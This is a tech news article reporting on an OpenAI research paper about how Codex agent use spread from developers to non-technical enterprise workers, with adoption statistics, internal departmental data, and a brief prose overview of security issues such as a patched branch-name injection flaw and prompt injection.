OpenAI Codex Data Shows Non-Developers Now Driving Enterprise AI Agent Surge
7 hour ago / Read about 38 minute
Source:TechTimes

Codex openai.com

OpenAI published economic research today documenting what may be the fastest large-scale shift in professional tool usage on record: enterprise non-developer workers adopted its agentic AI platform Codex at a pace 189 times faster than its August 2025 baseline, eclipsing the rate at which software engineers first took it up. The findings, released Thursday in a paper titled The Shift to Agentic AI: Evidence from Codex, end months of speculation about whether agentic AI would travel beyond technical teams by replacing it with hard usage data showing it already has — inside organizations, inside law firms, inside finance departments, and inside OpenAI itself.

The paper, authored by researchers from OpenAI, Columbia Business School, the Wharton School, and Duke University, analyzed usage across three populations: individual platform subscribers, organizational (enterprise) account holders, and OpenAI's own workforce. The dataset runs through June 11, 2026, and the scale it documents is large enough that the authors treat it as a signal about the broader trajectory of AI in the workplace, not just a product metric.

Read more: Samsung ChatGPT Enterprise: Codex Reaches Non-Developers in OpenAI's Biggest Korea Rollout

What Separates an AI Agent from a Chatbot

The central technical distinction in the paper is worth stating precisely, because the rest of the findings depend on it. A chatbot interaction is a single, self-contained exchange: a user submits a question or instruction and receives a response. An agentic AI system runs a different kind of loop. When a user delegates a task to Codex, the system does not generate a single reply. It enters a cycle: it reasons about what needs to happen, invokes an external tool — reading a file, executing code, running a test, querying a repository — receives the result, updates its understanding, and decides what to do next. That cycle repeats, without human intervention, until the task is complete or the agent determines it has reached a limit.

OpenAI measured this distinction directly: in the week before June 11, 2026, 60.3% of Codex sessions invoked at least one external tool, compared to 21.9% of ChatGPT sessions. That gap is the operational definition of agentic versus conversational. It also explains why token counts — the standard measure of AI usage — dramatically understate what Codex is doing relative to ChatGPT. A user who submits a Codex task estimated to require eight hours of human work is not generating more words. They are delegating more decision-making.

The paper documents how task complexity has changed as the platform matured. In December 2025, 35.4% of sampled individual users submitted at least one task that would take an experienced human at least an hour to complete without AI assistance. By May 2026, that figure had risen to 70.2%. The share of users submitting eight-hour-equivalent tasks grew nearly tenfold over the same period. By June 2026, the top 1% of daily active OpenAI employees were generating more than 60 hours of combined Codex agent runtime per day — not sequentially, but spread across multiple parallel agents running simultaneously.

More than 10% of users managed three or more concurrent Codex agents in a given week, and 26.6% used Skills — reusable instruction packages that let a user encode a recurring workflow once and invoke it on demand, without re-explaining it each time.

AI Agents Replace Chatbots at OpenAI Across Every Department

The internal OpenAI data is the most complete picture in the paper, because the company operates with no usage restrictions and substantial internal knowledge sharing about AI capabilities — making it, as the authors note, an outlier that provides a view of what adoption might look like when friction is minimized.

For the first several months after Codex launched publicly in April 2025, ChatGPT remained the default AI tool inside OpenAI. Engineers began drifting toward Codex first. By December 2025, the average engineer was generating the majority of AI output tokens through Codex rather than ChatGPT. That engineer figure is now 99%.

What followed was a faster transition in the departments that came later. Legal, Finance, and Recruiting reached 50% Codex usage by April 2026 — a crossover that took engineers several months to reach but that non-technical departments cleared in a matter of weeks. The average lawyer or recruiter at OpenAI now generates more than 85% of their output through Codex. At the company level, Codex accounts for 99.8% of all weekly AI output tokens generated by OpenAI employees across Codex and ChatGPT combined.

The intensity of use also accelerated sharply. Between November 2025 and June 2026, median monthly token output among active internal users rose 56-fold in the Research department, 32-fold in Customer Support, and 27-fold in Engineering. Legal saw a 13-fold increase over the same period.

Non-Developers Are the Fastest-Growing Segment Outside OpenAI

The internal pattern has a direct external counterpart. When Codex launched in April 2025, it was explicitly a developer tool, designed to write, review, and debug code. Its early external user base reflected that: primarily software engineers and technical individual contributors.

That distribution has reversed. Among individual platform subscribers, weekly non-developer users multiplied 137 times between August 2025 and early June 2026. Among enterprise organizational subscribers, the figure was 189-fold. The researchers attribute the acceleration to two reinforcing factors: Codex's expanding capability set moved it beyond pure coding toward general knowledge work tasks, and non-developers — once they encountered a tool that required no programming knowledge to use — proved more willing to delegate entirely than engineers, who often prefer iterative control.

A heat-map comparison in the paper illustrates the resulting task mix. Engineers use Codex primarily for engineering and coding work (72% of their output). Finance and business operations workers skew toward financial analysis and general knowledge work. Marketing and operations teams are majority knowledge-work users. But one finding cuts across every non-technical group: more than one-quarter of the work done by business-function employees involved engineering or coding tasks — work those employees would previously have needed technical assistance to complete.

Read more: OpenAI Codex Becomes Desktop Agent: Controls Mac Apps, Watches Screen, Runs on Mobile

Why Enterprise Adoption Is Moving Faster Than Most Organizations Expect

The Rogers diffusion model — the classic S-curve framework for how technologies spread through organizations — has historically suggested that transformative tools take several years to move from early technical adopters to broad institutional use. The OpenAI data suggests the S-curve for enterprise agentic AI is compressing dramatically. Inside OpenAI, the shift from developer-first to company-wide majority adoption took approximately eight months. The external enterprise data, while less complete, points in the same direction.

The paper's authors, who include economists from Columbia and Wharton, frame the implications across three audiences. For businesses, the finding is that capable, low-friction agentic tools — once available — expand rapidly and move well beyond technical pilots. The organizational challenge is not getting engineers to use an AI agent; it is redesigning workflows, approval processes, and skill requirements around a system where workers delegate, monitor, review, and coordinate multiple autonomous streams of work rather than executing tasks themselves.

For employees, the question the data raises is which skills become more valuable as agents handle larger portions of execution. The paper is not a displacement study, but parallel research from Microsoft's 2026 Work Trend Index — which surveyed 20,000 knowledge workers across ten countries — found that the skills workers identified as most important in an agentic AI environment were quality control of AI output and critical thinking. MIT economist Dario Acemoglu has cautioned that this transition phase tends to favor workers with the skills to supervise and coordinate delegated work, with the risk of widening gaps if workforce retraining does not keep pace.

For policymakers and labor economists, the paper provides the first large-scale empirical record of how agentic AI diffuses through a real organization — not a pilot or a controlled experiment, but a full organizational deployment tracked over more than a year.

How OpenAI Codex Handles a Full Day of Work

The paper's descriptions of power-user behavior are among its most technically revealing. The top 1% of daily active OpenAI employees are not submitting more requests — they are running more parallel agents. Rather than working through a single task at a time, they orchestrate multiple Codex agents simultaneously, each operating on a different workstream. The human role shifts from executor to coordinator: defining tasks, reviewing outputs, and redirecting agents rather than doing the work directly.

The mechanism that makes this economically viable at scale is prompt caching, described in detail in OpenAI's engineering documentation on the Codex agent loop. Every Codex task appends fresh instructions to an existing conversation that acts as the agent's running context. Because new content is always added at the end, the earlier content is always an exact prefix of what the model has already processed — a structural property that allows OpenAI's inference infrastructure to reuse prior computation rather than recalculating it. Without this mechanism, the raw data sent to the API would grow quadratically as a session extends; with it, the actual model computation stays closer to linear.

A related mechanism governs what happens when tasks grow long enough to hit the model's context window. Codex compacts: it replaces the full conversation history with a compressed summary that preserves the key decisions, outputs, and state the agent needs to continue, while discarding the raw exchange that produced them. Without this, long-horizon tasks — the kind that would take a human a full workday — would hit a hard ceiling and fail.

Security Considerations for Enterprise Deployments

The expanded scope of Codex — a tool that executes code, reads files, calls external tools, and operates in parallel across multiple simultaneous sessions — introduces an attack surface that security teams should account for before enterprise deployment.

In December 2025, security researchers at BeyondTrust's Phantom Labs discovered that Codex passed GitHub branch names directly into shell commands without sanitization. An attacker who could control a branch name could inject arbitrary commands, retrieve a victim's GitHub authentication token in cleartext, and gain read/write access to an entire codebase. SecurityWeek reported that OpenAI patched the vulnerability on February 5, 2026, and there is no evidence it was exploited before disclosure. A separate campaign documented in early 2026 involved a malicious npm package masquerading as a Codex UI tool that drew approximately 29,000 downloads before the payload was identified.

Security researchers have identified prompt injection — where instructions hidden in content the agent reads can redirect its behavior — as the defining risk class for agentic systems. The Open Worldwide Application Security Project has listed it as its top large language model risk for three consecutive years. Enterprise deployments of Codex should apply the same least-privilege and behavioral monitoring disciplines to AI agents that they apply to human identities with elevated access, which most organizations have not yet done, according to IDC analysis published in June 2026.


Frequently Asked Questions

What does it mean that non-developers are adopting Codex 189 times faster than the baseline?

The 189-fold figure measures how the number of weekly non-developer users on enterprise accounts grew between August 2025 and early June 2026, compared to the starting count. It does not mean non-developer users now outnumber developer users — developers remain the largest single group. It means the rate of new adoption among non-technical workers has been dramatically faster than among engineers, reversing the expected pattern for a tool that started as a developer product. The implication is that once a capable agentic AI tool is available with no programming requirement, non-technical workers adopt it more aggressively than the technical workers it was originally designed for.

How is agentic AI different from standard AI chatbots?

A chatbot handles one request at a time: a user submits a question, the AI generates a response, and the session ends. An agentic AI system runs an autonomous loop: it receives a goal, determines what steps are required, calls external tools to execute those steps, evaluates the results, and continues iterating — without prompting from the user — until the task is complete. The operational difference is that users of agentic AI are delegating work, not asking questions. OpenAI's paper measures this: 60.3% of Codex sessions invoked at least one external tool, compared to 21.9% for ChatGPT sessions, in the same measurement week.

What jobs or roles are most affected as AI agents take on knowledge work tasks?

The OpenAI paper is not a displacement study and does not address this directly. Parallel research into AI's labor market effects has found that job postings in roles most exposed to AI automation declined 17% while augmentation-friendly roles — those requiring judgment, supervision of AI output, and human-AI collaboration — grew 22%. MIT economist Dario Acemoglu has cautioned that this phase of adoption tends to favor workers with existing expertise to guide and evaluate delegated AI work, and may widen skill gaps if workforce retraining does not keep pace.

What should enterprise decision-makers do with the OpenAI research findings?

The paper's most direct implication for enterprise planning is timeline compression. Historical technology adoption research suggests that transformative tools take several years to move from early technical adopters to broad institutional use. The OpenAI data shows that transition happening in months inside an AI-native organization, and the external enterprise growth figures point in the same direction. Organizations treating agentic AI as a future planning item may be making that decision after the steep part of the adoption curve has already begun. The authors recommend that businesses focus not on whether to deploy agentic tools but on how to redesign workflows, approval processes, and skill development around a model where employees direct and review AI work rather than execute tasks themselves.